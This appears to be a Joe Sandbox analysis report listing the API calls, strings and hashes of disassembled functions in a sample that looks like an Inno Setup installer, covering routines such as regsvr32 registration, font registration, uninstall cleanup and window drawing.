                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$StretchText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2984075790-0
                                                                                                    • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                    • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                    • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                    • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                    • API String ID: 2051275411-1862435767
                                                                                                    • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                    • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                    • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                    • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                    APIs
                                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                    • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                    • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$Color$Draw$OffsetRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1005981011-0
                                                                                                    • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                    • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                    • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                    • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                    APIs
                                                                                                    • GetFocus.USER32 ref: 0041B745
                                                                                                    • GetDC.USER32(?), ref: 0041B751
                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                    • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 3275473261-1959103961
                                                                                                    • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                    • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                    • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                    • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                    APIs
                                                                                                    • GetFocus.USER32 ref: 0041BA17
                                                                                                    • GetDC.USER32(?), ref: 0041BA23
                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                    • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 3275473261-1959103961
                                                                                                    • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                    • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                    • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                    • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                      • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                    • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                    • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                    Strings
                                                                                                    • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                    • String ID: Deleting Uninstall data files.
                                                                                                    • API String ID: 1570157960-2568741658
                                                                                                    • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                    • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                    • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                    • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                    • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                    Strings
                                                                                                    • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                    • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                    • AddFontResource, xrefs: 004702B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                    • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                    • API String ID: 955540645-649663873
                                                                                                    • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                    • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                    • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                    • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                    APIs
                                                                                                      • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                      • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                      • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                    • GetVersion.KERNEL32 ref: 00462E60
                                                                                                    • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                    • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                    • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                    • String ID: Explorer
                                                                                                    • API String ID: 2594429197-512347832
                                                                                                    • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                    • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                    • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                    • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                    • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004783CC
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                    • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                    • API String ID: 2704155762-2318956294
                                                                                                    • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                    • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                    • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                    • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                      • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                    Strings
                                                                                                    • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                    • Deleting directory: %s, xrefs: 00459E5B
                                                                                                    • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                    • Stripped read-only attribute., xrefs: 00459E94
                                                                                                    • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorFindLast
                                                                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                    • API String ID: 754982922-1448842058
                                                                                                    • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                    • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                                    • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                    • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                                    APIs
                                                                                                    • GetCapture.USER32 ref: 00422EA4
                                                                                                    • GetCapture.USER32 ref: 00422EB3
                                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                                    • ReleaseCapture.USER32 ref: 00422EBE
                                                                                                    • GetActiveWindow.USER32 ref: 00422ECD
                                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                                    • GetActiveWindow.USER32 ref: 00422FBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 862346643-0
                                                                                                    • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                    • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                                    • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                                    • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                                    • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                                    • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveLong$Message
                                                                                                    • String ID:
                                                                                                    • API String ID: 2785966331-0
                                                                                                    • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                    • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                                    • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                                    • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0042948A
                                                                                                    • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                                      • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                                    • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                                    • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1583807278-0
                                                                                                    • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                    • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                                    • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                                    • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0041DE27
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                                    • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                                    • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                                    • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
